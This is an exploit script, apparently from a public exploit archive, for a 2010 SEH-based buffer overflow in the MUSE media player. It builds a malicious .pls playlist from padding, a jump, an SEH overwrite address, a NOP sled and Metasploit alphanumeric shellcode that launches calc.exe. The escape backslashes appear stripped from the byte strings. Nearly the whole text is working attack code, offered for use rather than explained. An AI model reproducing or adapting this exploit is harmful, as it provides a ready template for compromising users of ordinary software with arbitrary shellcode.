# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH]
# Date: August 17, 2010
# Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
# Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En

payload = "x41" * 1376
payload += "xebx06x90x90"
payload += "xAAx0cx02x10" # 10020CAA sdll.dll universal
payload += "x90" * 16
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com 
payload += ("xebx03x59xebx05xe8xf8xffxffxffx48x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax68"
"x58x30x41x31x50x42x41x6bx41x41x78x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x58x69x49x6cx49"
"x78x71x54x55x50x37x70x35x50x6cx4bx53x75x55x6cx6e"
"x6bx53x4cx74x45x62x58x56x61x4ax4fx4cx4bx30x4fx42"
"x38x6ex6bx73x6fx67x50x36x61x48x6bx70x49x6cx4bx66"
"x54x4ex6bx64x41x38x6ex74x71x49x50x7ax39x6ex4cx4e"
"x64x6bx70x52x54x44x47x4fx31x6bx7ax56x6dx46x61x5a"
"x62x5ax4bx78x74x67x4bx70x54x76x44x77x74x42x55x78"
"x65x6ex6bx53x6fx36x44x37x71x58x6bx30x66x4ex6bx44"
"x4cx62x6bx4ex6bx43x6fx57x6cx57x71x7ax4bx6cx4bx75"
"x4cx6ex6bx36x61x38x6bx6ex69x71x4cx44x64x75x54x79"
"x53x55x61x69x50x31x74x6ex6bx67x30x64x70x4fx75x59"
"x50x43x48x56x6cx6ex6bx41x50x76x6cx6cx4bx72x50x45"
"x4cx6cx6dx6ex6bx71x78x77x78x48x6bx66x69x4ex6bx6f"
"x70x4cx70x47x70x33x30x53x30x4cx4bx75x38x65x6cx43"
"x6fx76x51x78x76x75x30x50x56x4bx39x4bx48x6dx53x6f"
"x30x71x6bx76x30x35x38x78x70x4cx4ax75x54x63x6fx33"
"x58x4cx58x59x6ex6dx5ax34x4ex56x37x6bx4fx38x67x55"
"x33x45x31x30x6cx72x43x76x4ex53x55x53x48x70x65x37"
"x70x68")
payload += "x90" * 642

try:
    print "[+] Creating exploit file.."
    exploit = open('muse.pls','w');
    exploit.write(payload);
    exploit.close();
    print "[+] Writing", len(payload), "bytes to muse.pls"
    print "[+] Exploit file created!"
except:
    print "[-] Error: You do not have correct permissions.."